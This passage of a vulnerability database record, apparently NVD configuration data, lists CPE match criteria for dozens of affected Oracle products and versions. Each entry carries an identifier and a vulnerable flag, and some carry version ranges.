"cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "A079FD6E-3BB0-4997-9A8E-6F8FEC89887A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.1.0:*:*:*:*:*:*:*", 
matchCriteriaId: "900D2344-5160-42A0-8C49-36DBC7FF3D87", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.2.0:*:*:*:*:*:*:*", matchCriteriaId: "A4AA4B21-1BA9-4ED8-B9EA-558AF8655D24", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.0:*:*:*:*:*:*:*", matchCriteriaId: "9C3F9EE5-FCFC-45B8-9F57-C05D42EE0FF0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_express:*:*:*:*:*:*:*:*", matchCriteriaId: "90CFEC52-A574-493E-A2AC-0EC21851BBFA", versionEndExcluding: "19.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_service_level_management:13.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "3665B8A2-1F1A-490F-B01D-5B3455A6A539", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_service_level_management:13.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "A8577D60-A711-493D-9246-E49D0E2B07E0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:12.5.0.3:*:*:*:*:*:*:*", matchCriteriaId: "17EA8B91-7634-4636-B647-1049BA7CA088", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.1.0.1:*:*:*:*:*:*:*", matchCriteriaId: "5B4DF46F-DBCC-41F2-A260-F83A14838F23", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.2:*:*:*:*:*:*:*", matchCriteriaId: "5E5BC0B6-0C66-4FC5-81F0-6AC9BEC0813E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.2.0.1:*:*:*:*:*:*:*", matchCriteriaId: "10F17843-32EA-4C31-B65C-F424447BEF7B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.3:*:*:*:*:*:*:*", matchCriteriaId: "C784CEE8-F071-4583-A72D-F46C7C95FEC0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", matchCriteriaId: "A125E817-F974-4509-872C-B71933F42AD1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:*", matchCriteriaId: 
"BBE7BF09-B89C-4590-821E-6C0587E096B5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:*", matchCriteriaId: "ADAE8A71-0BCD-42D5-B38C-9B2A27CC1E6B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:*", matchCriteriaId: "E7231D2D-4092-44F3-B60A-D7C9ED78AFDF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:*", matchCriteriaId: "F7BDFC10-45A0-46D8-AB92-4A5E2C1C76ED", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:*", matchCriteriaId: "18127694-109C-4E7E-AE79-0BA351849291", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:*", matchCriteriaId: "33F68878-BC19-4DB8-8A72-BD9FE3D0ACEC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_enterprise_collections:*:*:*:*:*:*:*:*", matchCriteriaId: "660DB443-6250-4956-ABD1-C6A522B8DCCA", versionEndIncluding: "2.8.0", versionStartIncluding: "2.7.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "3625D477-1338-46CB-90B1-7291D617DC39", versionEndIncluding: "2.10.0", versionStartIncluding: "2.4.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:bi_publisher:5.5.0.0.0:*:*:*:*:*:*:*", matchCriteriaId: "5CD806C1-CC17-47BD-8BB0-9430C4253BC7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:bi_publisher:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "9DC56004-4497-4CDD-AE76-5E3DFAE170F0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:bi_publisher:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "274A0CF5-41E8-42E0-9931-F7372A65B9C4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:big_data_discovery:1.6:*:*:*:*:*:*:*", matchCriteriaId: "8C4C38FF-B75B-4DF1-BFB3-C91BDD10D90E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: 
"E869C417-C0E6-4FC3-B406-45598A1D1906", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "DFEFE2C0-7B98-44F9-B3AD-D6EC607E90DA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_analytics:12.1.1:*:*:*:*:*:*:*", matchCriteriaId: "55D98C27-734F-490B-92D5-251805C841B9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_application_session_controller:3.8m0:*:*:*:*:*:*:*", matchCriteriaId: "B796AC70-A220-48D8-B8CD-97CF57227962", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5:*:*:*:*:*:*:*", matchCriteriaId: "E6039DC7-08F2-4DD9-B5B5-B6B22DD2409F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5.0.23.0:*:*:*:*:*:*:*", matchCriteriaId: "790A89FD-6B86-49AE-9B4F-AE7262915E13", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0:*:*:*:*:*:*:*", matchCriteriaId: "7231AF76-3D46-41C4-83E9-6E9E12940BD9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E39D442D-1997-49AF-8B02-5640BE2A26CC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.0.0:*:*:*:*:*:*:*", matchCriteriaId: "A9317C01-22AA-452B-BBBF-5FAFFFB8BEA4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.1:*:*:*:*:*:*:*", matchCriteriaId: "C4534CF9-D9FD-4936-9D8C-077387028A05", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.2:*:*:*:*:*:*:*", matchCriteriaId: "D60384BD-284C-4A68-9EEF-0FAFDF0C21F3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.2.1:*:*:*:*:*:*:*", matchCriteriaId: "FCA44E38-EB8C-4E2D-8611-B201F47520E9", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:*", matchCriteriaId: "1A0E3537-CB5A-40BF-B42C-CED9211B8892", versionEndIncluding: "16.4.0", versionStartIncluding: "16.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_element_manager:8.1.1:*:*:*:*:*:*:*", matchCriteriaId: "0C57FD3A-0CC1-4BA9-879A-8C4A40234162", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_element_manager:8.2.0:*:*:*:*:*:*:*", matchCriteriaId: "698FB6D0-B26F-4760-9B9B-1C65FBFF2126", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_element_manager:8.2.1:*:*:*:*:*:*:*", matchCriteriaId: "4F1D64BC-17BF-4DAE-B5FC-BC41F9C12DFD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_interactive_session_recorder:*:*:*:*:*:*:*:*", matchCriteriaId: "4E16A16E-BFA3-4D17-9B4E-B42ADE725356", versionEndIncluding: "6.4", versionStartIncluding: "6.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_operations_monitor:*:*:*:*:*:*:*:*", matchCriteriaId: "9264AF8A-3819-40E5-BBCB-3B6C95A0D828", versionEndIncluding: "4.3", versionStartIncluding: "4.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_operations_monitor:3.4:*:*:*:*:*:*:*", matchCriteriaId: "D52F557F-D0A0-43D3-85F1-F10B6EBFAEDF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_operations_monitor:4.0:*:*:*:*:*:*:*", matchCriteriaId: "E3517A27-E6EE-497C-9996-F78171BBE90F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_operations_monitor:4.1.0:*:*:*:*:*:*:*", matchCriteriaId: "1C3CE8D5-6404-4CEB-953E-7B7961BC14D6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:*", matchCriteriaId: "062E4E7C-55BB-46F3-8B61-5A663B565891", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_session_report_manager:8.1.1:*:*:*:*:*:*:*", matchCriteriaId: "DB43DFD4-D058-4001-BD19-488E059F4532", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:communications_session_report_manager:8.2.0:*:*:*:*:*:*:*", matchCriteriaId: "086E2E5C-44EB-4C07-B298-C04189533996", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_session_report_manager:8.2.1:*:*:*:*:*:*:*", matchCriteriaId: "AA77B994-3872-4059-854B-0974AA5593D4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_session_route_manager:8.1.1:*:*:*:*:*:*:*", matchCriteriaId: "5682DAEB-3810-4541-833A-568C868BCE0B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_session_route_manager:8.2.0:*:*:*:*:*:*:*", matchCriteriaId: "01BC9AED-F81D-4344-AD97-EEF19B6EA8C7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_session_route_manager:8.2.1:*:*:*:*:*:*:*", matchCriteriaId: "8198E762-9AD9-452B-B1AF-516E52436B7D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.3:*:*:*:*:*:*:*", matchCriteriaId: "D0D177F6-25D9-4696-8528-3F57D91BAC12", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.0:*:*:*:*:*:*:*", matchCriteriaId: "539DA24F-E3E0-4455-84C6-A9D96CD601B3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2:*:*:*:*:*:*:*", matchCriteriaId: "726DB59B-00C7-444E-83F7-CB31032482AB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:diagnostic_assistant:2.12.36:*:*:*:*:*:*:*", matchCriteriaId: "80B6D265-9D72-45C3-AA2C-5B186E23CDAF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:*", matchCriteriaId: "AB654DFA-FEF9-4D00-ADB0-F3F2B6ACF13E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0:*:*:*:*:*:*:*", matchCriteriaId: "37209C6F-EF99-4D21-9608-B3A06D283D24", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B095CC03-7077-4A58-AB25-CC5380CDCE5A", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:enterprise_session_border_controller:8.4:*:*:*:*:*:*:*", matchCriteriaId: "7015A8CB-8FA6-423E-8307-BD903244F517", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: "B5BC32AA-78BE-468B-B92A-5A0FFFA970FA", versionEndIncluding: "7.3.5", versionStartIncluding: "7.3.3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: "FA699B16-5100-4485-9BB7-85B247743B17", versionEndIncluding: "8.1.0", versionStartIncluding: "8.0.2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:*:*:*:*:*:*:*:*", matchCriteriaId: "A7E00BA1-E643-45D9-97D3-EF12C29DB262", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_reconciliation_framework:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "2ACA29E6-F393-46E5-B2B3-9158077819A9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_asset_liability_management:*:*:*:*:*:*:*:*", matchCriteriaId: "703DA91D-3440-4C67-AA20-78F71B1376DD", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_asset_liability_management:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "39B8DFFF-B037-4F29-8C8E-F4BBC3435199", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_balance_sheet_planning:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "4D0D0EAC-300D-44B1-AD4A-93A368D5DBA1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:*:*:*:*:*:*:*:*", matchCriteriaId: "9CB2A0EB-E1C7-4206-8E64-D2EE77C1CD86", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_basic:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "8A566893-8DCF-49E4-93D0-0ACCEFD70D3D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:*:*:*:*:*:*:*:*", matchCriteriaId: "A180039F-22C3-458E-967D-E07C61C69FAF", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_basel_regulatory_capital_internal_ratings_based_approach:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "00E5D719-249D-48B8-BAFC-1E14D250B3F6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_foundation:*:*:*:*:*:*:*:*", matchCriteriaId: "2C5F6B8C-2044-4E68-98BD-37B0CD108434", versionEndIncluding: "8.0.8", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_governance_for_us_regulatory_reporting:*:*:*:*:*:*:*:*", matchCriteriaId: "672949B4-1989-4AA7-806F-EEC07D07F317", versionEndIncluding: "8.0.9", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_integration_hub:*:*:*:*:*:*:*:*", matchCriteriaId: "73E05211-8415-42FB-9B93-959EB03B090B", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "9476D1DA-C8A8-40A0-94DD-9B46C05FD461", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_enterprise_financial_performance_analytics:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "7DEE0A37-6B9A-43FE-B3E0-8AB5CA368425", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_enterprise_financial_performance_analytics:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "CF6A5433-A7D9-4521-9D28-E7684FB76E5B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:*:*:*:*:*:*:*:*", 
matchCriteriaId: "AC15899F-8528-4D10-8CD5-F67121D7F293", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "F727AAC6-6D9F-4B28-B07C-6A93916C43A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:*", matchCriteriaId: "30657F1B-D1FC-4EE6-9854-18993294A01D", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "51C17460-D326-4525-A7D1-0AED53E75E18", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:*:*:*:*:*:*:*:*", matchCriteriaId: "30F0991A-8507-48C4-9A8E-DE5B28C46A99", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_institutional_performance_analytics:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "A00142E6-EEB3-44BD-AB0D-0E5C5640557F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.0.1.0:*:*:*:*:*:*:*", matchCriteriaId: "00ED7CB0-96F7-4089-9047-A3AC241139C2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.2:*:*:*:*:*:*:*", matchCriteriaId: "005E458D-4059-4E20-A620-B25DEBCE40C2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "74008AEE-589F-423E-8D77-EA54C36D776A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.5.0.0:*:*:*:*:*:*:*", matchCriteriaId: "FD85DB06-692F-4E81-BEB7-1E41B438D1FD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: 
"6149C89E-0111-4CF9-90CA-0662D2F75E04", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "6CDDF6CA-6441-4606-9D2F-22A67BA46978", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "6FA0B592-A216-4320-A4FE-ABCA6B3E7D7A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_measurement_and_management:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "CEA4D6CF-D54A-40DF-9B70-E13392D0BE19", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:*", matchCriteriaId: "DB6C521C-F104-4E26-82F2-6F63F94108BC", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "397B1A24-7C95-4A73-8363-4529A7F6CFCC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.5:*:*:*:*:*:*:*", matchCriteriaId: "402B8642-7ACC-4F42-87A9-AB4D3B581751", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "EF6D5112-4055-4F89-A5B3-0DCB109481B7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "D262848E-AA24-4057-A747-6221BA22ADF4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_price_creation_and_discovery:*:*:*:*:*:*:*:*", matchCriteriaId: "2163B848-D684-4B17-969A-36E0866C5749", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:*:*:*:*:*:*:*:*", matchCriteriaId: 
"00615085-65B2-4211-A766-551842B3356F", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "F8E565DA-91BE-44FC-A28F-579BE8D2281A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_de_nederlandsche_bank:8.0.4:*:*:*:*:*:*:*", matchCriteriaId: "51DB64CA-8953-43BB-AEA9-D0D7E91E9FE3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "669BA301-4D29-4692-823B-CDEDD2A5BD18", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_european_banking_authority:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "419559E6-5441-4335-8FE1-6ADAAD9355DE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_us_federal_reserve:*:*:*:*:*:*:*:*", matchCriteriaId: "036E4450-53C6-4322-9C7D-91DA94C9A3C9", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_retail_customer_analytics:*:*:*:*:*:*:*:*", matchCriteriaId: "89C26226-A3CF-4D36-BBDA-80E298E0A51F", versionEndIncluding: "8.0.6", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_retail_performance_analytics:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "F67D1332-621E-4756-B205-97A5CF670A19", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_retail_performance_analytics:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "6748C867-0A52-452B-B4D6-DA80396F4152", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:2.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "A64B5C4C-DF69-4292-A534-EDC5955CDDAE", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:financial_services_revenue_management_and_billing:2.4.0.1:*:*:*:*:*:*:*", matchCriteriaId: "C7141C66-0384-4BA1-A788-91DEB7EF1361", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "06E586B3-3434-4B08-8BE3-16C528642CA5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.1.1:*:*:*:*:*:*:*", matchCriteriaId: "26A1F27B-C3AC-4D13-B9B2-2D6CF65D07BC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.2.0:*:*:*:*:*:*:*", matchCriteriaId: "B95E8056-51D8-4390-ADE3-661B7AE1D7CE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.2.2:*:*:*:*:*:*:*", matchCriteriaId: "4EFC8DAB-E5D8-420C-B800-08F8C5BF3F4F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.3.0:*:*:*:*:*:*:*", matchCriteriaId: "9059A907-508B-4844-8D7B-0FA68C0DF6A6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_translational_research:3.1.0:*:*:*:*:*:*:*", matchCriteriaId: "A5ACB1D2-69CE-4B7D-9B51-D8F80E541631", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_translational_research:3.2.1:*:*:*:*:*:*:*", matchCriteriaId: "B1F726C6-EA5A-40FF-8809-4F48E4AE6976", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_translational_research:3.3.1:*:*:*:*:*:*:*", matchCriteriaId: "CD7C26E3-BB0D-4218-8176-319AEA2925C8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_translational_research:3.3.2:*:*:*:*:*:*:*", matchCriteriaId: "DD67072F-3CFC-480D-9360-81A05D523318", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_translational_research:3.4.0:*:*:*:*:*:*:*", matchCriteriaId: "652E762A-BCDD-451E-9DE3-F1555C1E4B16", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:*", matchCriteriaId: "1A3DC116-2844-47A1-BEC2-D0675DD97148", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:*", 
matchCriteriaId: "E0F1DF3E-0F2D-4EFC-9A3E-F72149C8AE94", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:*", matchCriteriaId: "2AC63D10-2326-4542-B345-31D45B9A7408", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_simphony:*:*:*:*:*:*:*:*", matchCriteriaId: "7BFD7783-BE15-421C-A550-7FE15AB53ABF", versionEndIncluding: "19.1.2", versionStartIncluding: "19.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_simphony:18.1:*:*:*:*:*:*:*", matchCriteriaId: "1F7BF047-03C5-4A60-B718-E222B16DBF41", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_simphony:18.2:*:*:*:*:*:*:*", matchCriteriaId: "E3A73D81-3E1A-42E6-AB96-835CDD5905F2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_manager:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "AA10CA55-C155-4DAD-A109-87A80116F1A1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_accounting_analyzer:8.0.9:*:*:*:*:*:*:*", matchCriteriaId: "66136D6D-FC52-40DB-B7B6-BA8B7758CE16", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "06514F46-544B-4404-B45C-C9584EBC3131", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "3BD4BF9A-BF38-460D-974D-5B3255AAF946", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_data_foundation:*:*:*:*:*:*:*:*", matchCriteriaId: "92D538A5-819D-4DF7-85FE-4D4EB6E230E0", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_ifrs_17_analyzer:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "AEDA3A88-002B-4700-9277-3187C0A3E4B4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_ifrs_17_analyzer:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "BE886BC5-F807-4627-8233-2290817FE205", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:*:*:*:*:*:*:*:*", matchCriteriaId: "B47C73D0-BE89-4D87-8765-12C507F13AFF", versionEndIncluding: "5.6.0.0", versionStartIncluding: "5.0.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.6.1.0:*:*:*:*:*:*:*", matchCriteriaId: "5B8AA91A-1880-43CD-938D-48EF58ACF2CF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_performance_insight:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "E6B5D7DB-C70E-4926-819F-E39B79F4D0C5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*", matchCriteriaId: "41684398-18A4-4DC6-B8A2-3EBAA0CBF9A6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A7506589-9B3B-49BA-B826-774BFDCC45B8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "335AB6A7-3B1F-4FA8-AF08-7D64C16C4B04", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper_and_adf:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "37EB4A1D-A875-46B7-BEB0-694D1F400CF7", vulnerable: true, }, { criteria: 